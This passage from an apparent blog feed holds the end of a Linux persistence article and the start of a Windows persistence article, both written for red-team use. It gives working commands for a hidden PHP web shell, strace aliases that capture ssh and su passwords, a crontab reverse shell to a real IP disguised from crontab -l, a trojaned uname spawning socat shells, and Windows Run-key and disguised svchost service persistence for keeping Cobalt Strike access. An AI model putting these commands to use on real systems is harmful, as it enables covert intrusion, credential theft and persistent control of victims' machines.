&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;nohup &lt;/span&gt;vim &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"py3file excalibra.py"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /dev/null 2&amp;gt;&amp;amp;1 &amp;amp;&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;sleep &lt;/span&gt;2 &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; excalibra.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One can observe the vim process in the background, but not the Python process.&lt;/p&gt;

&lt;p&gt;Principle reference: &lt;a href="https://github.com/jaredestroud/WOTD" rel="noopener noreferrer"&gt;https://github.com/jaredestroud/WOTD&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  PAM Backdoor
&lt;/h3&gt;

&lt;p&gt;PAM (Pluggable Authentication Modules) is an authentication mechanism proposed by Sun. It provides a set of dynamic link libraries and a unified API, separating the service provided by the system from its authentication method. This enables system administrators to flexibly configure different authentication methods for different services without modifying the service programmes, and also facilitates the addition of new authentication mechanisms to the system.&lt;/p&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/litsand/shell" rel="noopener noreferrer"&gt;https://github.com/litsand/shell&lt;/a&gt;&lt;br&gt;&lt;br&gt;
This is an automated script. It is more suited to CentOS; my test environment was Ubuntu, so I will not reproduce it for the time being.&lt;/p&gt;
&lt;h3&gt;
  
  
  Carriage Return Backdoor (&lt;code&gt;\r&lt;/code&gt;)
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;echo -e "&lt;span class="cp"&gt;&amp;lt;?=&lt;/span&gt;&lt;span class="err"&gt;\`\&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;excalibra&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="err"&gt;\`&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;\r&lt;span class="cp"&gt;&amp;lt;?=&lt;/span&gt;&lt;span class="s1"&gt;'Excalibra  '&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;" &amp;gt;/var/www/html/excalibra.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;After adding the &lt;code&gt;-e \r&lt;/code&gt; parameter, viewing the source code directly only reveals the latter half.&lt;/p&gt;
&lt;h3&gt;
  
  
  strace Backdoor
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;strace&lt;/code&gt; is often used to trace the system calls and signals received during a process's execution. In the Linux world, processes cannot directly access hardware devices; when a process needs to access hardware (e.g., reading disk files, receiving network data), it must switch from user mode to kernel mode and access the hardware through system calls. &lt;code&gt;strace&lt;/code&gt; can trace the system calls generated by a process, including parameters, return values, and execution time consumed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;ssh&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'strace   -o   /tmp/sshpwd-`date    '&lt;/span&gt;+%d%h%m%s&lt;span class="s1"&gt;'`.log  \
 -e read,write,connect  -s2048 ssh'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is similar to the alias backdoor.&lt;/p&gt;

&lt;p&gt;When testing with Docker, include the &lt;code&gt;--privileged&lt;/code&gt; parameter.&lt;/p&gt;

&lt;p&gt;Similarly, one can record other commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;su&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'strace   -o   /tmp/sulog-`date    '&lt;/span&gt;+%d%h%m%s&lt;span class="s1"&gt;'`.log  \
 -e read,write,connect  -s2048 su'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Tiny shell
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/orangetw/tsh" rel="noopener noreferrer"&gt;https://github.com/orangetw/tsh&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Compile under Linux:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./compile.sh linux 149.129.72.186 1234 excalibra 22
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The parameters represent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;usage:
compile.sh os BC_HOST BC_PORT &lt;span class="o"&gt;[&lt;/span&gt;PASSWORD] &lt;span class="o"&gt;[&lt;/span&gt;BC_DELAY]
compile.sh os 8.8.8.8 8081
compile.sh os 8.8.8.8 8081 mypassword 60


Please specify one of these targets:

    compile.sh linux
    compile.sh freebsd
    compile.sh openbsd
    compile.sh netbsd
    compile.sh cygwin
    compile.sh sunos
    compile.sh irix
    compile.sh hpux
    compile.sh osf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Upon success, the files &lt;code&gt;tsh&lt;/code&gt; and &lt;code&gt;tshd&lt;/code&gt; are generated, representing the client and server respectively.&lt;br&gt;&lt;br&gt;
Run on the target:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;umask &lt;/span&gt;077&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;HOME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/tmp ./tshd
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the attack machine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;tsh targetip
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A shell will be obtained. Additionally, file upload and download are supported.&lt;/p&gt;

&lt;p&gt;Reverse connection form.&lt;/p&gt;

&lt;h3&gt;
  
  
  Browser Plugin Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/graniet/chromebackdoor" rel="noopener noreferrer"&gt;https://github.com/graniet/chromebackdoor&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I spent considerable time testing this project, but have not yet succeeded; it is unclear whether the browser imposes restrictions.&lt;/p&gt;

&lt;h3&gt;
  
  
  Local Job Scheduling
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Crontab
&lt;/h4&gt;

&lt;p&gt;Test environment: macOS&lt;br&gt;&lt;br&gt;
Scheduled reverse shell:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;(&lt;/span&gt;crontab &lt;span class="nt"&gt;-l&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;printf&lt;/span&gt; &lt;span class="s2"&gt;"*/1 * * * * /usr/bin/nc 30.157.170.75 1389 /bin/sh;&lt;/span&gt;&lt;span class="se"&gt;\r&lt;/span&gt;&lt;span class="s2"&gt;no crontab for &lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="nb"&gt;whoami&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="s2"&gt;%100c&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;|crontab -
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Other Backdoor
&lt;/h3&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/iamckn/backdoors" rel="noopener noreferrer"&gt;https://github.com/iamckn/backdoors&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Some process hiding techniques, followed by a reverse shell.&lt;/p&gt;

&lt;p&gt;Demonstration using &lt;code&gt;uname&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;uname.sh&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#uname&lt;/span&gt;
&lt;span class="c"&gt;#-------------------------&lt;/span&gt;
&lt;span class="nb"&gt;touch&lt;/span&gt; /usr/local/bin/uname

&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; &amp;gt;&amp;gt; /usr/local/bin/uname
#!/bin/bash
#nc.traditional -l -v -p 4444 -e /bin/bash 2&amp;gt;/dev/null &amp;amp;
#socat TCP4-Listen:3177,fork EXEC:/bin/bash 2&amp;gt;/dev/null &amp;amp;
socat SCTP-Listen:1177,fork EXEC:/bin/bash 2&amp;gt;/dev/null &amp;amp;
#perl -MIO -e'&lt;/span&gt;&lt;span class="nv"&gt;$s&lt;/span&gt;&lt;span class="sh"&gt;=new IO::Socket::INET(LocalPort=&amp;gt;1337,Listen=&amp;gt;1);while(&lt;/span&gt;&lt;span class="nv"&gt;$c&lt;/span&gt;&lt;span class="sh"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$s&lt;/span&gt;&lt;span class="sh"&gt;-&amp;gt;accept()){&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="sh"&gt;=&amp;lt;&lt;/span&gt;&lt;span class="nv"&gt;$c&lt;/span&gt;&lt;span class="sh"&gt;&amp;gt;;print &lt;/span&gt;&lt;span class="nv"&gt;$c&lt;/span&gt;&lt;span class="sh"&gt; `&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="sh"&gt;`;}' 2&amp;gt;/dev/null &amp;amp;
/bin/uname &lt;/span&gt;&lt;span class="se"&gt;\$&lt;/span&gt;&lt;span class="sh"&gt;@
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Replace the reverse shell command as needed.  &lt;/p&gt;

&lt;h2&gt;
  
  
  0x03 Rootkit
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is a Rootkit?
&lt;/h3&gt;

&lt;p&gt;In suspenseful spy films, one faction typically dispatches an agent to infiltrate the opposing camp. The agent's excellent disguise allows them to remain undetected for an extended period; to maintain long-term concealment, they avoid high-risk actions that might prematurely expose them. They earn the enemy's trust and attain a high-ranking position, enabling them to continuously acquire vital intelligence and transmit it through unique channels.&lt;/p&gt;

&lt;p&gt;In a sense, this uninvited guest is akin to a Rootkit—a programme that resides persistently and undetectably on a target computer, manipulates the system, and collects data through covert channels. The three essential elements of a Rootkit are: concealment, manipulation, and data collection.&lt;/p&gt;

&lt;p&gt;The term "root" originates from the Unix realm. As the Unix system administrator account is called root—which possesses the fewest security restrictions—fully controlling a host and gaining administrator privileges is referred to as having "rooted" the computer. However, "rooting" a host does not guarantee sustained control, because an administrator may detect the intrusion and take remedial action. Hence, the initial meaning of Rootkit is "a set of tools that can maintain root privileges."&lt;/p&gt;

&lt;p&gt;Simply put, a Rootkit is a special type of malicious software whose function is to hide itself and designated files, processes, and network connections on the installed target. Rootkits are commonly combined with other malicious programmes such as Trojans and backdoors. By loading special drivers and modifying the system kernel, Rootkits achieve the purpose of concealment.&lt;/p&gt;

&lt;p&gt;A typical rootkit includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;1 An Ethernet sniffer programme, used to capture usernames and passwords transmitted over the network.&lt;/li&gt;
&lt;li&gt;2 Trojan horse programmes, such as &lt;code&gt;inetd&lt;/code&gt; or &lt;code&gt;login&lt;/code&gt;, to provide a backdoor for the attacker.&lt;/li&gt;
&lt;li&gt;3 Programmes to hide the attacker's directories and processes, such as &lt;code&gt;ps&lt;/code&gt;, &lt;code&gt;netstat&lt;/code&gt;, &lt;code&gt;rshd&lt;/code&gt;, and &lt;code&gt;ls&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;4 It may also include log cleaning tools, such as &lt;code&gt;zap&lt;/code&gt;, &lt;code&gt;zap2&lt;/code&gt;, or &lt;code&gt;z2&lt;/code&gt;, which the attacker uses to delete entries regarding their activities from log files like &lt;code&gt;wtmp&lt;/code&gt;, &lt;code&gt;utmp&lt;/code&gt;, and &lt;code&gt;lastlog&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Some complex rootkits can also offer services like telnet, shell, and finger to the attacker.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Application-Level Rootkit
&lt;/h3&gt;

&lt;p&gt;Application-level rootkits primarily achieve concealment by bulk replacement of system commands—for instance, replacing &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;ps&lt;/code&gt;, and &lt;code&gt;netstat&lt;/code&gt; to hide files, processes, and network connections. Sometimes a daemon process is present to ensure the stability of the backdoor. Two commonly used Trojans are &lt;code&gt;mafix&lt;/code&gt; and &lt;code&gt;brookit&lt;/code&gt;. Application-level rootkits are relatively easy to remove; the most troublesome are kernel-level and hardware-level rootkits.&lt;/p&gt;

&lt;h3&gt;
  
  
  Kernel-Level Rootkit
&lt;/h3&gt;

&lt;p&gt;These load backdoors via kernel modules, which is comparatively complex. Kernel backdoors are generally operating-system specific, as kernel module programming varies between different operating systems and is not typically universal. Kernel backdoors usually cannot be detected through checks like MD5 verification, making them fundamentally difficult to discover. Currently, kernel backdoors are more prevalent on Linux and Solaris.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hardware-Level Backdoor
&lt;/h3&gt;

&lt;p&gt;This refers to backdoors embedded in the manufacturer's hardware, such as CPUs, motherboards, mice, etc.  &lt;/p&gt;

&lt;p&gt;Demonstration: the example I located should be a kernel rootkit; for other classic kernel rootkits, one may examine these:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/David-Reguera-Garcia-Dreg/enyelkm" rel="noopener noreferrer"&gt;https://github.com/David-Reguera-Garcia-Dreg/enyelkm&lt;/a&gt;&lt;br&gt;&lt;br&gt;
&lt;a href="https://github.com/yaoyumeng/adore-ng" rel="noopener noreferrer"&gt;https://github.com/yaoyumeng/adore-ng&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Reptile
&lt;/h3&gt;

&lt;p&gt;Test environment: Kali&lt;/p&gt;

&lt;p&gt;Project address: &lt;a href="https://github.com/f0rb1dd3n/Reptile" rel="noopener noreferrer"&gt;https://github.com/f0rb1dd3n/Reptile&lt;/a&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>persistence</category>
      <category>cybersecurity</category>
      <category>maintenance</category>
    </item>
    <item>
      <title>Windows Persistence Techniques</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 10 Jun 2026 08:44:21 +0000</pubDate>
      <link>https://dev.to/excalibra/windows-persistence-techniques-53p8</link>
      <guid>https://dev.to/excalibra/windows-persistence-techniques-53p8</guid>
      <description>&lt;h2&gt;
  
  
  0x00 Preface and Scenario
&lt;/h2&gt;

&lt;p&gt;In red team operations, it is currently common practice to use Cobalt Strike (CS) for unified management of acquired shells or phished targets. However, practical experience reveals that CS does not natively integrate a one‑click persistence function. Many third‑party plugins developed by the community are either incomplete or cumbersome to use, and some even contain bugs that give a false impression of success, ultimately resulting in the loss of the shell.&lt;br&gt;&lt;br&gt;
Consequently, this article collates persistence methods within the Windows environment based on the aforementioned scenario. Subsequently, a selection of the more frequently employed and convenient operations will be integrated into a CS plugin to ensure that access is rapidly maintained immediately after a shell is obtained.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x01 Startup Directory
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; With or without elevation.&lt;br&gt;&lt;br&gt;
This is the most common and simplest method of persistence. Programmes or shortcuts placed in this directory execute automatically when a user logs in.&lt;br&gt;&lt;br&gt;
For NT6 and later, the directories are as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;Current&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;:
&lt;span class="kd"&gt;C&lt;/span&gt;:\Users\Username\AppData\Roaming\Microsoft\Windows\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\Startup
&lt;span class="kd"&gt;All&lt;/span&gt; &lt;span class="kd"&gt;users&lt;/span&gt;:
&lt;span class="kd"&gt;C&lt;/span&gt;:\ProgramData\Microsoft\Windows\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\StartUp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For pre‑NT6 systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;Current&lt;/span&gt; &lt;span class="kd"&gt;user&lt;/span&gt;:
&lt;span class="kd"&gt;C&lt;/span&gt;:\Documents &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;Settings&lt;/span&gt;\Hunter\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\Startup
&lt;span class="kd"&gt;All&lt;/span&gt; &lt;span class="kd"&gt;users&lt;/span&gt;:
&lt;span class="kd"&gt;C&lt;/span&gt;:\Documents &lt;span class="kd"&gt;and&lt;/span&gt; &lt;span class="kd"&gt;Settings&lt;/span&gt;\All &lt;span class="kd"&gt;Users&lt;/span&gt;\Start &lt;span class="kd"&gt;Menu&lt;/span&gt;\Programs\Startup
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  0x02 Registry Keys
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; With or without elevation.&lt;br&gt;&lt;br&gt;
The extensive Windows registry and its relatively lax permission management provide numerous opportunities for manipulation. Among these, registry auto‑start entries are a frequently used persistence mechanism.&lt;br&gt;&lt;br&gt;
As the core database of Windows, the registry stores a wealth of critical system and user information. Windows provides two independent registry paths: &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt; (HKCU), which pertains to the current user, and &lt;code&gt;HKEY_LOCAL_MACHINE&lt;/code&gt; (HKLM), which corresponds to the physical machine and can be modified only by privileged accounts.&lt;br&gt;&lt;br&gt;
With the increasing awareness of security, most Windows machines compromised during red team engagements operate with reduced privileges. For example, elevating privileges on a phished PC is often unnecessary; even if an Administrator’s startup entry is written after elevation, the user will still log into their own account on the next session, rendering the persistence ineffective.&lt;br&gt;&lt;br&gt;
All relevant registry keys for Windows persistence are enumerated below:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1. Load Key
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load

2. Userinit Key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
This key normally contains userinit.exe. It permits multiple programmes separated by commas, e.g. userinit.exe,evil.exe.

3. Explorer\Run Key
The Explorer\Run key exists under both HKCU and HKLM.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

4. RunServicesOnce Key
This key starts service programmes before user logon and prior to other programmes launched via registry keys. It exists under both HKCU and HKLM.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

5. RunServices Key
Programmes specified here run immediately after those from RunServicesOnce, but both execute before user logon.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

6. RunOnce\Setup Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup

7. RunOnce Key
Installation programmes typically use the RunOnce key to auto‑start. Its locations are:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
[Pre‑NT6] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
The HKLM RunOnce key runs immediately after user logon, before other Run keys; the HKCU RunOnce key runs after the operating system has processed other Run keys and the Startup folder.

8. Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Run is the most commonly employed auto‑start key. The HKCU Run key executes after the HKLM Run key, but both are processed before the Startup folder.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Command to write a registry key:&lt;br&gt;&lt;br&gt;
&lt;code&gt;reg add "XXXX" /v evil /t REG_SZ /d "[Absolute Path]\evil.exe"&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  0x03 Services
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
Creating a service requires non‑reduced administrator rights; therefore, privilege escalation is a prerequisite for this persistence method. However, it offers higher stealth compared to registry keys (e.g. loading a DLL via svchost service groups can conceal the malicious process). Both CMD and PowerShell can add services with commands. Example:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sc create evil binpath= "cmd.exe /k [Absolute Path]evil.exe" start= "auto" obj= "LocalSystem"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This straightforward approach launches a service via cmd. A minor pitfall exists: a shellcode loader that blocks the main thread may cause the service to appear unresponsive during startup and fail. Hence, invoking cmd is mandatory; the service cannot be created directly. Upon successful start, the process runs with SYSTEM privileges before user logon. The obvious drawback is that the malicious process remains a distinct entity, reducing stealth, as illustrated below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5ymfskoe35ayg6f6qj5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5ymfskoe35ayg6f6qj5.png" alt=" " width="796" height="211"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Another category of services is launched through svchost. Numerous Windows services are loaded by injecting into this host process (a Microsoft‑sanctioned DLL injection mechanism). Consequently, if the DLL itself evades detection, antivirus software will ignore this behaviour; moreover, as the malicious process is not standalone, stealth is enhanced.&lt;br&gt;&lt;br&gt;
However, loading a service via svchost cannot be accomplished with a single command. It requires crafting a service DLL and adding extra registry entries. Because 64‑bit systems have dual registry views and two svchost instances, the commands differ slightly.&lt;br&gt;&lt;br&gt;
Commands for 32‑bit systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="kd"&gt;binPath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"C:\Windows\System32\svchost.exe -k netsvr"&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt; &lt;span class="kd"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;LocalSystem&lt;/span&gt;
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync\Parameters &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ServiceDll&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_EXPAND_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\localService32.dll"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;Description&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"Windows Time Synchronization Service"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;DisplayName&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"TimeSyncSrv"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;netsvr&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_MULTI_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Commands for registering a 32‑bit service on 64‑bit systems:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;create&lt;/span&gt; &lt;span class="kd"&gt;TimeSync&lt;/span&gt; &lt;span class="kd"&gt;binPath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"C:\Windows\Syswow64\svchost.exe -k netsvr"&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt; &lt;span class="kd"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;LocalSystem&lt;/span&gt;
&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="kd"&gt;HKLM&lt;/span&gt;\SYSTEM\CurrentControlSet\services\TimeSync\Parameters &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ServiceDll&lt;/span&gt; &lt;span class="na"&gt;/t &lt;/span&gt;&lt;span class="kd"&gt;REG_EXPAND_SZ&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\localService32.dll"&lt;/span&gt; &lt;span class="na"&gt;/f /reg&lt;/span&gt;:32
